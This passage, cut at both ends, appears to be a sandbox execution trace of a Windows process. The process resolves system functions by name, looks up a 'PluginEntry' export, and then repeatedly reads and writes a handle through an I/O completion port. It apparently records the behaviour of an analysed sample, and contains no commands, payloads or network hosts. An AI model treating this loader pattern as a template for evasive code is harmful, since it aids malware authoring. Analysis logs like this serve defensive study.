(hModule=0x76600000, lpProcName="FindFirstFileW") returned 0x76614435 [0078.902] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemDirectoryW") returned 0x76615063 [0078.902] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleFileNameW") returned 0x76614950 [0078.902] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcessId") returned 0x766111f8 [0078.903] GetProcAddress (hModule=0x76600000, lpProcName="DeleteCriticalSection") returned 0x76fa45f5 [0078.903] GetProcAddress (hModule=0x76600000, lpProcName="ExpandEnvironmentStringsW") returned 0x76614173 [0078.903] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76710000 [0078.903] GetProcAddress (hModule=0x76710000, lpProcName="CoInitialize") returned 0x7672b636 [0078.903] GetProcAddress (hModule=0x76710000, lpProcName="CoCreateGuid") returned 0x767515d5 [0078.903] GetProcAddress (hModule=0x76710000, lpProcName="CoCreateInstance") returned 0x76759d0b [0078.903] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x74f40000 [0078.904] GetProcAddress (hModule=0x74f40000, lpProcName="SHGetFolderPathW") returned 0x74fc5708 [0078.904] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f70000 [0078.904] GetProcAddress (hModule=0x76f70000, lpProcName="RtlRandom") returned 0x770398c3 [0078.904] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x76a40000 [0078.904] GetProcAddress (hModule=0x76a40000, lpProcName="??2@YAPAXI@Z") returned 0x76a4b0c9 [0078.904] GetProcAddress (hModule=0x76a40000, lpProcName="??3@YAXPAX@Z") returned 0x76a4b0b9 [0078.904] GetProcAddress (hModule=0x76a40000, lpProcName="puts") returned 0x76ab8d04 [0078.905] GetProcAddress (hModule=0x76a40000, lpProcName="exit") returned 0x76a536aa [0078.905] GetProcAddress (hModule=0x76a40000, lpProcName="abort") returned 0x76aa8e53 [0078.905] GetProcAddress (hModule=0x76a40000, lpProcName="memset") returned 0x76a49790 [0078.905] GetProcAddress (hModule=0x76a40000, lpProcName="wcsrchr") returned 0x76a4a73f [0078.905] GetProcAddress (hModule=0x76a40000, lpProcName="memcpy") returned 0x76a49910 [0078.905] GetProcAddress (hModule=0x76a40000, lpProcName="free") returned 0x76a49894 [0078.905] GetProcAddress (hModule=0x76a40000, lpProcName="wcslen") returned 0x76a5d335 [0078.906] GetProcAddress (hModule=0x76a40000, lpProcName="memmove") returned 0x76a49e5a [0078.906] GetProcAddress (hModule=0x76a40000, lpProcName="malloc") returned 0x76a49cee [0078.906] GetProcAddress (hModule=0x76a40000, lpProcName="realloc") returned 0x76a4b10d [0078.906] GetProcAddress (hModule=0x76a40000, lpProcName="strlen") returned 0x76a543d3 [0078.906] GetProcAddress (hModule=0x76a40000, lpProcName="_snprintf") returned 0x76a6fa7c [0078.906] _strcmpi (_Str1="PluginEntry", _Str2="PluginEntry") returned 0 [0078.906] SetEvent (hEvent=0x244) returned 1 [0078.906] GetCurrentThreadId () returned 0x5b0 [0078.906] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0078.906] GetLastError () returned 0x3e5 [0078.906] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.907] GetCurrentThreadId () returned 0x5b0 [0078.907] WriteFile (in: hFile=0x268, lpBuffer=0x2605b18, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2605b18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0078.908] SetEvent (hEvent=0x260) returned 1 [0078.908] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.908] SetEvent (hEvent=0x244) returned 1 [0078.909] GetCurrentThreadId () returned 0x5b0 [0078.909] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0078.909] GetLastError () returned 0x3e5 [0078.909] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0078.909] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.159] GetCurrentThreadId () returned 0x5b0 [0079.159] SetEvent (hEvent=0x244) returned 1 [0079.159] GetCurrentThreadId () returned 0x5b0 [0079.159] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0079.159] GetLastError () returned 0x3e5 [0079.159] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.161] GetCurrentThreadId () returned 0x5b0 [0079.161] WriteFile (in: hFile=0x268, lpBuffer=0x262bfb8, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x262bfb8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0079.161] SetEvent (hEvent=0x2bc) returned 1 [0079.161] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.161] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.162] SetEvent (hEvent=0x25c) returned 1 [0079.162] GetCurrentThreadId () returned 0x5b0 [0079.162] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0079.162] GetLastError () returned 0x3e5 [0079.162] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.394] GetCurrentThreadId () returned 0x5b0 [0079.394] SetEvent (hEvent=0x244) returned 1 [0079.394] GetCurrentThreadId () returned 0x5b0 [0079.394] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0079.394] GetLastError () returned 0x3e5 [0079.394] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.395] GetCurrentThreadId () returned 0x5b0 [0079.395] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0079.395] SetEvent (hEvent=0x2bc) returned 1 [0079.395] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.395] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.396] SetEvent (hEvent=0x25c) returned 1 [0079.397] GetCurrentThreadId () returned 0x5b0 [0079.397] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0079.397] GetLastError () returned 0x3e5 [0079.397] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.628] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0079.628] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.628] GetCurrentThreadId () returned 0x5b0 [0079.628] SetEvent (hEvent=0x244) returned 1 [0079.628] GetCurrentThreadId () returned 0x5b0 [0079.628] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0079.628] GetLastError () returned 0x3e5 [0079.628] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.629] GetCurrentThreadId () returned 0x5b0 [0079.629] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0079.629] SetEvent (hEvent=0x2bc) returned 1 [0079.629] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.629] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0079.631] SetEvent (hEvent=0x25c) returned 1 [0079.631] GetCurrentThreadId () returned 0x5b0 [0079.631] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0079.631] GetLastError () returned 0x3e5 [0079.631] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.030] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0080.030] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.030] GetCurrentThreadId () returned 0x5b0 [0080.030] SetEvent (hEvent=0x244) returned 1 [0080.030] GetCurrentThreadId () returned 0x5b0 [0080.030] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.030] GetLastError () returned 0x3e5 [0080.030] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.031] GetCurrentThreadId () returned 0x5b0 [0080.031] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0080.031] SetEvent (hEvent=0x2bc) returned 1 [0080.031] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.031] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.032] SetEvent (hEvent=0x25c) returned 1 [0080.032] GetCurrentThreadId () returned 0x5b0 [0080.032] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.032] GetLastError () returned 0x3e5 [0080.032] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.267] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0080.267] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.267] GetCurrentThreadId () returned 0x5b0 [0080.267] SetEvent (hEvent=0x244) returned 1 [0080.267] GetCurrentThreadId () returned 0x5b0 [0080.267] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.267] GetLastError () returned 0x3e5 [0080.267] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.268] GetCurrentThreadId () returned 0x5b0 [0080.268] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0080.268] SetEvent (hEvent=0x2bc) returned 1 [0080.268] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.268] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.269] SetEvent (hEvent=0x25c) returned 1 [0080.269] GetCurrentThreadId () returned 0x5b0 [0080.269] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.269] GetLastError () returned 0x3e5 [0080.269] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.501] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0080.501] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.501] GetCurrentThreadId () returned 0x5b0 [0080.501] SetEvent (hEvent=0x244) returned 1 [0080.501] GetCurrentThreadId () returned 0x5b0 [0080.501] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.501] GetLastError () returned 0x3e5 [0080.501] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.502] GetCurrentThreadId () returned 0x5b0 [0080.502] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0080.502] SetEvent (hEvent=0x2bc) returned 1 [0080.502] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.502] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.503] SetEvent (hEvent=0x25c) returned 1 [0080.503] GetCurrentThreadId () returned 0x5b0 [0080.503] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.503] GetLastError () returned 0x3e5 [0080.503] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.734] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0080.734] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.735] GetCurrentThreadId () returned 0x5b0 [0080.735] SetEvent (hEvent=0x244) returned 1 [0080.735] GetCurrentThreadId () returned 0x5b0 [0080.735] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.735] GetLastError () returned 0x3e5 [0080.735] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.736] GetCurrentThreadId () returned 0x5b0 [0080.736] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0080.736] SetEvent (hEvent=0x2bc) returned 1 [0080.737] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.737] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.738] SetEvent (hEvent=0x25c) returned 1 [0080.738] GetCurrentThreadId () returned 0x5b0 [0080.738] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.738] GetLastError () returned 0x3e5 [0080.738] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.970] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0080.970] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.970] GetCurrentThreadId () returned 0x5b0 [0080.970] SetEvent (hEvent=0x244) returned 1 [0080.970] GetCurrentThreadId () returned 0x5b0 [0080.970] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.970] GetLastError () returned 0x3e5 [0080.970] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.972] GetCurrentThreadId () returned 0x5b0 [0080.972] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0080.972] SetEvent (hEvent=0x2bc) returned 1 [0080.972] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.972] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0080.973] SetEvent (hEvent=0x25c) returned 1 [0080.973] GetCurrentThreadId () returned 0x5b0 [0080.973] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0080.974] GetLastError () returned 0x3e5 [0080.974] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0081.526] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 